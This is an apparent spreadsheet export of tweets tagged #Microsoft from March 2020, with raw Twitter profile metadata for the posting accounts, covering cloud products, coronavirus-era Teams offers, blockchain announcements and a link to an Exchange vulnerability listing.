    <t>{'id': 26706077, 'id_str': '26706077', 'name': 'Microsoft Developer Ireland', 'screen_name': 'MSdevIRL', 'location': 'Ireland', 'description': 'Follow for Dev tips, resources, code samples &amp; events. Everything you need to develop great apps! \n\nSupport: @MicrosoftHelps', 'url': 'https://t.co/wFjYCZDIwx', 'entities': {'url': {'urls': [{'url': 'https://t.co/wFjYCZDIwx', 'expanded_url': 'https://developer.microsoft.com/en-ie/', 'display_url': 'developer.microsoft.com/en-ie/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2667, 'friends_count': 1652, 'listed_count': 109, 'created_at': 'Thu Mar 26 07:16:21 +0000 2009', 'favourites_count': 2147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2837, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1126806403312685056/_7NLNTAX_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126806403312685056/_7NLNTAX_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26706077/1425652061',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</si>
  <si>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16:05:19 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN load balancing for @windowsserver RRAS in #Azure using the @KempTech LoadMaster load balancer. #Windows10 #Win10 #Microsoft #ADC #mobility #aovpn https://t.co/X5Of25nZRr</t>
  </si>
  <si>
    <t>Wed Mar 04 16:04:46 +0000 2020</t>
  </si>
  <si>
    <t>Boost sales productivity: Meet customers at any journey point, implement seamless solutions, ease onboarding &amp;amp; alignment +more. Read more &amp;amp; subscribe!  #Microsoft #Dynamics365 and Basileia Consulting Group. https://t.co/1oJMnNwMln</t>
  </si>
  <si>
    <t>{'id': 43652176, 'id_str': '43652176', 'name': 'Bill Durham', 'screen_name': 'bcgak', 'location': 'Orange County, CA', 'description': 'We transform the abstract concept of cloud computing into tangible, cost effective results for our clients.', 'url': 'http://t.co/3z5Rm0tyyB', 'entities': {'url': {'urls': [{'url': 'http://t.co/3z5Rm0tyyB', 'expanded_url': 'http://www.bcgak.com', 'display_url': 'bcgak.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 198, 'friends_count': 255, 'listed_count': 3, 'created_at': 'Sun May 31 06:13:42 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 650,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'http://pbs.twimg.com/profile_images/654512166234517505/_UARPhqz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/654512166234517505/_UARPhqz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43652176/1444883103',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</si>
  <si>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16:04:09 +0000 2020</t>
  </si>
  <si>
    <t>Join @kekline and the #SQLServer Tools team for an #S1Webinar on the benefits of using SQL Server and #Microsofts native tools, and how they're changing with the times. Attend in North America on March 18: https://t.co/E0u3r8jvbW or in EMEA on March 19: https://t.co/u5Q0TvouxD https://t.co/2tGYLRGIqQ</t>
  </si>
  <si>
    <t>{'id': 21787282, 'id_str': '21787282', 'name': 'SentryOne', 'screen_name': 'SentryOne', 'location': 'Charlotte, NC', 'description': 'We empower the Microsoft data professional to achieve breakthrough performance across physical, virtual and cloud environments.', 'url': 'https://t.co/Amb0RbJ3ki', 'entities': {'url': {'urls': [{'url': 'https://t.co/Amb0RbJ3ki', 'expanded_url': 'http://SentryOne.com', 'display_url': 'SentryOne.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5601, 'friends_count': 1912, 'listed_count': 179, 'created_at': 'Tue Feb 24 19:34:58 +0000 2009', 'favourites_count': 7240, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5626,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'http://pbs.twimg.com/profile_images/1121418979120164869/51bObkxM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121418979120164869/51bObkxM_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21787282/1559834346', 'profile_link_color': 'C4122F',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</si>
  <si>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16:03:17 +0000 2020</t>
  </si>
  <si>
    <t>Fashion e-retailer Stitch Fix is the algorithm queen, taking #datascience to new heights. With #Microsoft #PowerBI and #Azure, OneStop Solutions can help you bring powerful #AI insights into your company. https://t.co/n83ca3dgpc</t>
  </si>
  <si>
    <t>Wed Mar 04 16:03:00 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft are giving away #enterprise conferencing tools due to #coronavirus https://t.co/BPPUJsmRVW #SankalpIT</t>
  </si>
  <si>
    <t>Wed Mar 04 16:02:50 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/x6fQZaPsHr</t>
  </si>
  <si>
    <t>{'id': 225242439, 'id_str': '225242439', 'name': 'BestnetworksInc', 'screen_name': 'BestNetworksInc', 'location': 'Chicago', 'description': 'Computer Networking Services and Consulting in the Chicago Land area. Look to us for Structure data cabling. Communications -VOIP, MPLS, T1, SIP Trunk, PRI, BRI', 'url': 'http://t.co/RXnfq6Qbse', 'entities': {'url': {'urls': [{'url': 'http://t.co/RXnfq6Qbse', 'expanded_url': 'http://www.bestnetworks.NET', 'display_url': 'bestnetworks.NET', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 84, 'friends_count': 49, 'listed_count': 1, 'created_at': 'Sat Dec 11 02:36:07 +0000 2010', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1155,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'http://pbs.twimg.com/profile_images/697866621457559552/n_hOPF-h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/697866621457559552/n_hOPF-h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/225242439/1455220338',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</si>
  <si>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16:01:57 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #EY And #ConsenSys To Make The Public #Ethereum Blockchain Safe For Enterprises via @forbes https://t.co/d8NWceuHae #Blockchain</t>
  </si>
  <si>
    <t>Wed Mar 04 16:01:02 +0000 2020</t>
  </si>
  <si>
    <t>Visual Studio @code users have a new NoSQL database option with all of the unique benefits that FaunaDB offers, including 100% ACID transactions. https://t.co/HyNQDFOCSD
#Microsoft #VSCode #VisualStudioCode #Serverless #Javascript #FaunaDB</t>
  </si>
  <si>
    <t>{'id': 2408321504, 'id_str': '2408321504', 'name': 'Fauna', 'screen_name': 'fauna', 'location': 'San Francisco | Boston', 'description': 'FaunaDB is a #serverless database with a native #GraphQL API. Industryâ€™s most generous free data tier!\n\nFollow @faunastatus for live operational updates.', 'url': 'https://t.co/mTovvDe3M3', 'entities': {'url': {'urls': [{'url': 'https://t.co/mTovvDe3M3', 'expanded_url': 'http://fauna.com', 'display_url': 'fauna.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 37539, 'friends_count': 1039, 'listed_count': 104, 'created_at': 'Mon Mar 24 04:13:08 +0000 2014', 'favourites_count': 1261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1528,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'http://pbs.twimg.com/profile_images/1042842571511291905/FuQfC3sh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042842571511291905/FuQfC3sh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2408321504/1572973116', 'profile_link_color': '1B95E0',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</si>
  <si>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16:00:52 +0000 2020</t>
  </si>
  <si>
    <t>Empower your customers to work remotely with #Microsoft technology https://t.co/ROY0PvgeIY</t>
  </si>
  <si>
    <t>{'id': 2221641834, 'id_str': '2221641834', 'name': 'HUB Technology Solutions', 'screen_name': 'HUBTechSol', 'location': 'Winnipeg, Manitoba, Canada', 'description': "We can help you improve your business with our award-winning IT services, quality IT solutions, and our track record of success. Let's talk!", 'url': 'http://t.co/8diaUd1a6Y', 'entities': {'url': {'urls': [{'url': 'http://t.co/8diaUd1a6Y', 'expanded_url': 'http://www.hub.ca', 'display_url': 'hub.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 140, 'listed_count': 0, 'created_at': 'Fri Nov 29 15:39:04 +0000 2013', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 529,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'http://pbs.twimg.com/profile_images/378800000820650514/3de4834cfa4fa615167c96b91b937da9_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000820650514/3de4834cfa4fa615167c96b91b937da9_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2221641834/1521229430', 'profile_link_color': '00529C',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</si>
  <si>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16:00:40 +0000 2020</t>
  </si>
  <si>
    <t>Former Windows chief reveals Microsofts reaction to the iPad https://t.co/F7MUlGFu9o #Apple #iPad #Microsoft #Market #Tablets https://t.co/YVNFloZEC1</t>
  </si>
  <si>
    <t>{'id': 4876948522, 'id_str': '4876948522', 'name': 'Quentin Landau', 'screen_name': 'QuentinLandau', 'location': 'In the thick of it', 'description': 'Senior Tech Product Manager freelance #PropositionValue #BusinessModel #Innovation #SocialMedia #UserExperience', 'url': 'https://t.co/EP0LU2O96L', 'entities': {'url': {'urls': [{'url': 'https://t.co/EP0LU2O96L', 'expanded_url': 'https://linkedin.com/in/quentinlandau', 'display_url': 'linkedin.com/in/quentinlandâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 213, 'friends_count': 67, 'listed_count': 499, 'created_at': 'Thu Feb 04 17:24:20 +0000 2016', 'favourites_count': 228, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13231,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'http://pbs.twimg.com/profile_images/752458071503503360/KUfz476W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/752458071503503360/KUfz476W_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4876948522/1490560070', 'profile_link_color': '9100FF',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</si>
  <si>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16:00:28 +0000 2020</t>
  </si>
  <si>
    <t>Troste
#teammg #marriedgames #games #gaming #game #jogos #jogo #pc #console #computador #playstation #ps4 #xbox #xboxone #xboxonex #sony #microsoft #switch #nintendo #nintendogames #nintendoswitch #gamer https://t.co/6IC92TLKSm</t>
  </si>
  <si>
    <t>Wed Mar 04 16:00:21 +0000 2020</t>
  </si>
  <si>
    <t>Code name radish 34
Baseline protocol 
Welcome to adoption 
#Chainlink $Link $Ubt #Eminent #eea #Magicbus #Microsoft #EY #Consensys
https://t.co/1xVqCRhL1P</t>
  </si>
  <si>
    <t>{'id': 939079832041861121, 'id_str': '939079832041861121', 'name': 'Stevo.lunk', 'screen_name': 'StevoCrypt', 'location': 'England, United Kingdom', 'description': 'Just your average marine. Always looking for promotion. Linkpool crowdsale investor. Fibonacci and Elliott wave enthusiast. ðŸ¦†ðŸ¦†ðŸ¦†. $Link', 'url': 'https://t.co/2qVQIkqr8z', 'entities': {'url': {'urls': [{'url': 'https://t.co/2qVQIkqr8z', 'expanded_url': 'https://chain.link', 'display_url': 'chain.link', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 401, 'friends_count': 447, 'listed_count': 0, 'created_at': 'Fri Dec 08 10:30:54 +0000 2017', 'favourites_count': 4639, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1438, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1134324190289453058/SGg84LqU_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134324190289453058/SGg84LqU_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/939079832041861121/1542081185',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</si>
  <si>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16:00:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft makes a crossborder connection in North America.
https://t.co/wZs8wsIXlZ
#elpaso #juarez #jrz #ep #binational #border #borderland #microsoft  #connectingminds #microsoftTechspark #thebridgeccelerator #business #technology #future #borderplex</t>
  </si>
  <si>
    <t>{'id': 2493348456, 'id_str': '2493348456', 'name': 'Technology HUB', 'screen_name': 'TechHUBjuarez', 'location': 'JuÃ¡rez, Chihuahua', 'description': 'El mÃ¡ximo ecosistema de #innovaciÃ³n y \n#emprendimiento | \nThe ultimate #innovation and #entrepreneurship ecosystem', 'url': 'https://t.co/b6M8COjPdT', 'entities': {'url': {'urls': [{'url': 'https://t.co/b6M8COjPdT', 'expanded_url': 'http://www.t-hub.mx', 'display_url': 't-hub.mx', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2528, 'friends_count': 1725, 'listed_count': 41, 'created_at': 'Tue May 13 18:24:01 +0000 2014', 'favourites_count': 766, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3852,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'http://pbs.twimg.com/profile_images/948582354917847040/USgXZLbv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/948582354917847040/USgXZLbv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2493348456/1514994678', 'profile_link_color': 'D43120',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</si>
  <si>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16:00:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Exchange 2019 15.2.221.12 #Remote Code Execution https://t.co/HghQ3mitDa #PacketStorm</t>
  </si>
  <si>
    <t>Wed Mar 04 16:00:03 +0000 2020</t>
  </si>
  <si>
    <t>I feel so honored. Two Microsoft employees have been included in Marktechposts Top Artificial Intelligence Influencers To Follow in 2020 list. Congratulations, @nigewillson! #Microsoft #AI #Artificial #Intelligence https://t.co/5wLh2fusPs</t>
  </si>
  <si>
    <t>{'id': 3245885960, 'id_str': '3245885960', 'name': 'Ido Katz', 'screen_name': 'send2katz', 'location': 'Israel', 'description': 'MSFT FTE | Cloud Ninja | Microsoft Azure MVP Alumni | Public Speaker | Entrepreneur\u200b | Mentor | Trainer | Geek | Celtics Fan | Living The Dream', 'url': 'https://t.co/f5vfCDNldp', 'entities': {'url': {'urls': [{'url': 'https://t.co/f5vfCDNldp', 'expanded_url': 'https://www.facebook.com/clouds4all', 'display_url': 'facebook.com/clouds4all', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 363, 'friends_count': 425, 'listed_count': 58, 'created_at': 'Mon Jun 15 10:11:37 +0000 2015', 'favourites_count': 210, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5442,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'http://pbs.twimg.com/profile_images/781080589894053888/7Y0uRkh4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/781080589894053888/7Y0uRkh4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3245885960/1434363595',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</si>
  <si>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15:56:21 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft offers 6 month free trial of paid Teams tier in light of Coronavirus #Microsoft #Office365 #Microsoft365 #MicrosoftTeams #Coronavirus https://t.co/E4SPwYSjG3</t>
  </si>
  <si>
    <t>Wed Mar 04 15:54:47 +0000 2020</t>
  </si>
  <si>
    <t>Have you seen a Long-Distant Haircut?
This is the Future of China
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/YSUZxcdprS</t>
  </si>
  <si>
    <t>Wed Mar 04 15:54:13 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 2019 Pro PlusPC  Lifetime License Key  FAST DELIVERY #2019 #Delivery #FAST #License #Lifetime #Microsoft #office #PlusPC # https://t.co/cBNQZSbyMT</t>
  </si>
  <si>
    <t>Wed Mar 04 15:54:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 2019 Professional Plus Download &amp;amp;amp; Key- 32/64 Bit FAST DELIVERY #2019 #32/64 #Delivery #Download #FAST #Microsoft #office #Plus #professional https://t.co/1fh0ZgFTux</t>
  </si>
  <si>
    <t>Wed Mar 04 15:50:27 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/0GM7nMyceH</t>
  </si>
  <si>
    <t>{'id': 125718660, 'id_str': '125718660', 'name': 'NCS.IT', 'screen_name': 'ncssupport', 'location': 'Rossendale, Lancashire', 'description': 'We are an IT company dealing with businesses. Founded in 1994, and now marking over 10 years as a Microsoft Gold Partner. \n\nðŸ“ž01706 239000\n\nðŸ’»info@ncs-support.com', 'url': 'http://t.co/N2HoVY06hZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/N2HoVY06hZ', 'expanded_url': 'http://www.ncs-support.com', 'display_url': 'ncs-support.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1432, 'friends_count': 1712, 'listed_count': 82, 'created_at': 'Tue Mar 23 17:03:06 +0000 2010', 'favourites_count': 498, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13069,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'http://pbs.twimg.com/profile_images/1143876240375472129/EkQxhc1t_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143876240375472129/EkQxhc1t_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/125718660/1580831765', 'profile_link_color': '9266CC',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</si>
  <si>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Wed Mar 04 15:47:29 +0000 2020</t>
  </si>
  <si>
    <t>The Baseline Protocol... includes #EY, #Microsoft, #Splunk, #ConsenSys, #MakerDAO, #dukeuniversity  #Chainlink, #Unibright, #Envision Blockchain, #Neocova, #CoreConvergence, Provide and W3BCloud.
$LINK $ETH $BTC
https://t.co/WixTn90dng</t>
  </si>
  <si>
    <t>{'id': 14944911, 'id_str': '14944911', 'name': 'Ave', 'screen_name': 'ave_eli', 'location': 'Cosmos', 'description': 'â¬¡ Notes from:', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 707, 'friends_count': 3657, 'listed_count': 11, 'created_at': 'Thu May 29 15:25:20 +0000 2008', 'favourites_count': 12080, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6303,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'http://pbs.twimg.com/profile_images/1145528339869908992/enxaPnA0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145528339869908992/enxaPnA0_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14944911/1562433694', 'profile_link_color': 'C37602', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '949395', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 15:47:03 +0000 2020</t>
  </si>
  <si>
    <t>Yep, we use our own services :) Cool video of Rob Flores using Workspaces and #Collaboration tech to work w/ teammates around the world - any time ... on any device: https://t.co/qkQCna2V3r 
#O365 #MicrosoftTeams #cisco #vmware #citrix #microsoft #CEO #CIO #COO #IT @EvolveIP</t>
  </si>
  <si>
    <t>{'id': 10402392, 'id_str': '10402392', 'name': 'Don Mennig', 'screen_name': 'Don_Mennig', 'location': '', 'description': 'Marketing Executive. Photography nut. Sports enthusiast. Tweeting to help folks improve their businesses + sharing my favorite photos. #doop!', 'url': 'http://t.co/GBqw5bdGYo', 'entities': {'url': {'urls': [{'url': 'http://t.co/GBqw5bdGYo', 'expanded_url': 'http://www.donmennig.com/wordpress', 'display_url': 'donmennig.com/wordpress', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 156, 'friends_count': 185, 'listed_count': 16, 'created_at': 'Tue Nov 20 04:06:43 +0000 2007', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/282785190/don-bw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/282785190/don-bw_normal.jpg',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</si>
  <si>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15:45:10 +0000 2020</t>
  </si>
  <si>
    <t>#ProcessMining made easy, comfortable and affordable. Test-drive #PAFnow in #PowerBI. Improve your business processes through #PowerAutomate and #Microsoft #PowerPlatform  See it to believe it! https://t.co/W61D8F1WvD https://t.co/MUHRYjRy8j</t>
  </si>
  <si>
    <t>{'id': 27835897, 'id_str': '27835897', 'name': 'Tobias Rother | CEO Process Analytics Factory', 'screen_name': 'torother', 'location': 'Frankfurt', 'description': "https://t.co/cmgiJsLSZR #ProcessMining made easy, comfortable and affordable. \nTest-drive #PAFnow in #PowerBI. It's free: https://t.co/iMofJt61Ev", 'url': 'http://t.co/gpzBeTjKpo', 'entities': {'url': {'urls': [{'url': 'http://t.co/gpzBeTjKpo', 'expanded_url': 'http://www.linkedin.com/in/tobiasrother', 'display_url': 'linkedin.com/in/tobiasrother', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/cmgiJsLSZR', 'expanded_url': 'http://pafnow.com', 'display_url': 'pafnow.com', 'indices': [0, 23]}, {'url': 'https://t.co/iMofJt61Ev', 'expanded_url': 'http://bit.ly/2LFDAU6', 'display_url': 'bit.ly/2LFDAU6', 'indices': [122, 145]}]}}, 'protected': False, 'followers_count': 144, 'friends_count': 303, 'listed_count': 3, 'created_at': 'Tue Mar 31 08:08:56 +0000 2009', 'favourites_count': 140, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 202,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'http://pbs.twimg.com/profile_images/1235310799238901763/5X4fL-Ir_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235310799238901763/5X4fL-Ir_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27835897/1583356022',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</si>
  <si>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15:43:23 +0000 2020</t>
  </si>
  <si>
    <t>#getsix_Services yesterday enjoying the 6th Edition of '#AzureDayPL', Warsaw - the first and largest community conference dedicated to #Microsoft #Azure technologies in #Poland.
Contact us if you have any questions regarding Azure - https://t.co/tOJxN2Sk5h https://t.co/jMusXQ4q0P</t>
  </si>
  <si>
    <t>{'id': 300422945, 'id_str': '300422945', 'name': 'getsix', 'screen_name': 'getsix_Group', 'location': 'WrocÅ‚aw, Warsaw, PoznaÅ„', 'description': 'Business Services, Consulting, Accounting, HR &amp; Payroll , IT Solutions, Tax &amp; Legal Services. Member of HLB International @hlbi and HLB Poland @hlb_poland', 'url': 'https://t.co/D8WeztN0Ar', 'entities': {'url': {'urls': [{'url': 'https://t.co/D8WeztN0Ar', 'expanded_url': 'http://www.getsix.eu', 'display_url': 'getsix.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 7, 'listed_count': 2, 'created_at': 'Tue May 17 18:52:33 +0000 2011', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 575,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'http://pbs.twimg.com/profile_images/1701992501/getsix_icon_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1701992501/getsix_icon_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/300422945/1399632116',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</si>
  <si>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15:42:29 +0000 2020</t>
  </si>
  <si>
    <t>Our students attended a workshop at Microsoft in the Westchester Mall.  Students used the new Microsoft S7 tablets to create presentations about their own business plans. #Microsoft #MsgrScanlanHighSchool #S7 https://t.co/JzSnfA6f8R</t>
  </si>
  <si>
    <t>{'id': 2964599993, 'id_str': '2964599993', 'name': 'Monsignor Scanlan HS', 'screen_name': 'MsgrScanlanHS', 'location': '', 'description': 'Instagram: MsgrScanlanHS\n\nFacebook: Monsignor Scanlan High School', 'url': 'http://t.co/mUSnwdSg6P', 'entities': {'url': {'urls': [{'url': 'http://t.co/mUSnwdSg6P', 'expanded_url': 'http://www.scanlanhs.edu', 'display_url': 'scanlanhs.edu', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 247, 'friends_count': 42, 'listed_count': 0, 'created_at': 'Tue Jan 06 17:37:29 +0000 2015', 'favourites_count': 116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 333,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'http://pbs.twimg.com/profile_images/700054773723168770/Tipk4OGI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/700054773723168770/Tipk4OGI_normal.jpg', 'profile_link_color': '000080',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</si>
  <si>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15:41:13 +0000 2020</t>
  </si>
  <si>
    <t>It was all real. All of it. This journey these past few years with you guys has been amazing. I cant believe this is just the beginning! #chainlink #link $link #microsoft https://t.co/rXd6PEFqg4</t>
  </si>
  <si>
    <t>{'id': 1158002289963151366, 'id_str': '1158002289963151366', 'name': 'goldeneye', 'screen_name': 'goldeneyelinkop', 'location': '', 'description': 'Team link $1000 end of year $10000 end of decade', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Sun Aug 04 13:10:35 +0000 2019', 'favourites_count': 40,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'http://pbs.twimg.com/profile_images/1233774590008201221/ULzzWDVe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233774590008201221/ULzzWDVe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1158002289963151366/1582989888',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</si>
  <si>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15:41:02 +0000 2020</t>
  </si>
  <si>
    <t>China's Economy Crashed.
The World has moved its #SupplyChain
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/5Yh62ZqcZJ</t>
  </si>
  <si>
    <t>#Microsoft finally shows off the new Start menu. Things will appear more simplified and live tiles may be going away. https://t.co/7mJUxrjjnw</t>
  </si>
  <si>
    <t>{'id': 102390085, 'id_str': '102390085', 'name': 'Magenium Solutions', 'screen_name': 'Magenium', 'location': 'Chicago, IL', 'description': 'We deliver technology solutions that solve problems and move business forward making us a trusted partner to hundreds of Midwest businesses.', 'url': 'http://t.co/rXRcTiDBql', 'entities': {'url': {'urls': [{'url': 'http://t.co/rXRcTiDBql', 'expanded_url': 'http://www.magenium.com', 'display_url': 'magenium.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 396, 'friends_count': 535, 'listed_count': 55, 'created_at': 'Wed Jan 06 14:50:44 +0000 2010', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1723, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFEFE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1009085251421782018/sPXTQvyw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1009085251421782018/sPXTQvyw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102390085/1578585948', 'profile_link_color': '540E5E',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</si>
  <si>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Wed Mar 04 15:37:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, EY and ConsenSys Tout New Way for Big Biz to Use Public Ethereum: A trio of heavy-hitters has come up with a new way of using the ethereum mainnet to connect firms internal systems for resource planning. https://t.co/2biS2S4Vyf #Business #Ethereum #Microsoft https://t.co/iI09l2Xg2E</t>
  </si>
  <si>
    <t>Wed Mar 04 15:37:02 +0000 2020</t>
  </si>
  <si>
    <t>New! Live Events Assistance | #Microsoft Tech Community Resource Center https://t.co/MW0ypgGB7g https://t.co/qLuBGSJ0jX</t>
  </si>
  <si>
    <t>{'id': 707579579855147010, 'id_str': '707579579855147010', 'name': 'IW Mentor', 'screen_name': 'iwmentor', 'location': 'United States', 'description': 'SharePoint, Office 365, PowerApps &amp; Power Automate online training company, by @WonderLaura', 'url': 'https://t.co/PBin2GxAdG', 'entities': {'url': {'urls': [{'url': 'https://t.co/PBin2GxAdG', 'expanded_url': 'http://www.iwmentor.com', 'display_url': 'iwmentor.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1366, 'friends_count': 3248, 'listed_count': 95, 'created_at': 'Wed Mar 09 14:51:32 +0000 2016', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2260,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'http://pbs.twimg.com/profile_images/713111760060809216/dSRxtMRI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/713111760060809216/dSRxtMRI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/707579579855147010/1459004656', 'profile_link_color': '0E869E',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</si>
  <si>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Mar 04 15:35:26 +0000 2020</t>
  </si>
  <si>
